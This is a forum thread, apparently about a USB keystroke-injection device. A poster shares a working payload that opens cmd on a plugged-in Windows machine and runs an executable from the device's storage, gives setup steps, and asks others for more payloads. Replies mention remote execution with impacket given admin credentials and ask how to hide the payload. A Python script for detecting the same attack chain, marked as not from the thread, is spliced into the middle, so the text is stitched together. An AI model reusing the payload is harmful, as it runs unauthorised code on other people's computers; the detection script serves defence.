hoppler Posted November 26, 2018

Hello. I have the following payload:

LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED ATTACK
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.txt" ]; then
    QUACK ${SWITCH_POSITION}/my_script.txt
    LED FINISH
fi

Well, my_script.txt gets executed. Great. But now my question: why isn't it working if I change "my_script.txt" to "my_script.exe"?

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.exe" ]; then
    QUACK ${SWITCH_POSITION}/my_script.exe
    LED FINISH
fi

Or is there another easy way to execute the .exe file without going through PowerShell or cmd? Maybe through Ethernet??? An example or actually an answer would be great. Maybe Darren could help??? Thanks in advance.
PoSHMagiC0de Posted November 26, 2018

Negative. For the victim to execute the exe, it will have to be run by the victim. That means you have to type out the command to run it with Quack, or have it run inside a batch, cmd or PowerShell console. If you know the password of the machine, know the firewall for SMB or WMI is done and the AccountTokenFilterPolicy is set to 1, or the machine is on a domain and the account has admin, you could use impacket's smbexec.py or wmiexec.py to do it, but you will need admin creds to use them. What you were doing above is trying to type out the exe. Quack doesn't run, it types. The txt works because it is a text file, so it just typed it out. The exe will not, or if it does it will be a bunch of binary data being typed out. So, the network way requires admin credentials if you do not want to type out a stager.
hoppler Posted November 28, 2018

Wow, thank you for this straight answer. Now I get the picture. But I figured out a way to run an executable through the command line, even without admin rights. Maybe somebody could use it. Here is my solution:

Note: if you need a different keyboard layout, add this: DUCKY_LANG gb (or anything else)

Payload.txt:

ATTACKMODE HID STORAGE
LED R SLOW
Q GUI r
Q DELAY 500
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING "for /l %a in (0) do ( for %a in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %a:/my_folder/my.exe (start %a:/my_folder/my.exe & exit) )"
Q ENTER
LED OFF

Well, it's actually very simple, and it runs on any Windows machine. How does it work?

1. Create a folder on the BB storage or any other storage with the name my_folder (you can name it like you want).
2. Put an executable file in the above folder (e.g. my.exe).
3. Copy the above code into the payload.txt of switch 1 or switch 2.
4. That's all.

As soon as you insert the BB it starts the HID attack. The BB opens a cmd window and runs an infinite loop searching for the file. If the file exists it executes the exe file and exits the cmd window. Simple but effective.

Ok, that's one way to achieve my goal, running an executable from an external storage. But now I would like to know how you guys would run an executable from the BB. Any attack mode is allowed, so please give me your ideas and payloads. It would be great if the OS starts from Windows XP on, but from Windows 7 on is fine, too. Let's make a challenge out of this! Because many people, many thoughts, result in many solutions. Hope you guys have a great day!!!
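As an added example that is not code from this thread, here is a defender's counterpart to hoppler's payload: a small Python correlation check over process-creation and USB-arrival records that flags a keyboard and a mass-storage device arriving together (ATTACKMODE HID STORAGE), explorer.exe then spawning cmd.exe (the Win+R step), and cmd.exe launching an executable from a non-C: drive. The event records, their field names, the 120-second window and the assumption that C: is the system drive are all constructed for the example, not a real Windows or Sysmon schema.

```python
# Added example, not code from the thread. Records are constructed and simplified:
# each dict has a timestamp "ts" (seconds) plus either a USB arrival or a
# process-creation record. The typed for-loop itself never shows up in a
# process-creation command line (it is console input), so the check keys on the
# device arrivals and the process chain instead.
import re
from typing import Iterable

WINDOW_SECONDS = 120  # assumption: the payload fires shortly after plug-in
# assumption: C: is the system drive, so any other drive letter is "removable"
REMOVABLE = re.compile(r"^[D-Z]:[\\/]", re.IGNORECASE)

def detect(events: Iterable[dict]) -> list[str]:
    """Return one alert per executable started by a cmd.exe that explorer.exe
    spawned shortly after a keyboard and a mass-storage device arrived together."""
    alerts = []
    kbd_at = storage_at = None
    cmd_pids = {}  # pid -> ts of cmd.exe spawned by explorer.exe inside the window
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "usb_arrival":
            if ev["class"] == "hid_keyboard":
                kbd_at = ev["ts"]
            elif ev["class"] == "mass_storage":
                storage_at = ev["ts"]
            continue
        image, parent = ev["image"].lower(), ev["parent_image"].lower()
        both = kbd_at is not None and storage_at is not None
        recent = (both and abs(kbd_at - storage_at) <= 5
                  and ev["ts"] - max(kbd_at, storage_at) <= WINDOW_SECONDS)
        if recent and image.endswith("\\cmd.exe") and parent.endswith("\\explorer.exe"):
            cmd_pids[ev["pid"]] = ev["ts"]
        elif ev["parent_pid"] in cmd_pids and REMOVABLE.match(ev["image"]):
            delay = ev["ts"] - cmd_pids[ev["parent_pid"]]
            alerts.append(f"ts={ev['ts']}: {ev['image']} started by cmd.exe pid "
                          f"{ev['parent_pid']} {delay}s after explorer.exe spawned it, "
                          f"following keyboard+storage arrival")
    return alerts

# Constructed sample log: the chain from the payload above, plus benign noise.
SAMPLE_EVENTS = [
    {"ts": 100, "type": "usb_arrival", "class": "hid_keyboard"},
    {"ts": 101, "type": "usb_arrival", "class": "mass_storage"},
    {"ts": 103, "type": "process_create", "pid": 4100, "parent_pid": 1200,
     "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe"},
    {"ts": 104, "type": "process_create", "pid": 4188, "parent_pid": 4100,
     "image": r"E:\my_folder\my.exe", "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"ts": 900, "type": "process_create", "pid": 5000, "parent_pid": 1200,
     "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```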
Zwite Posted November 15, 2019

The file explorer keeps popping up after I try running the payload on switch 1. I can't figure out a way to make it stop doing that. Also, is there a way to make it run its payload invisibly?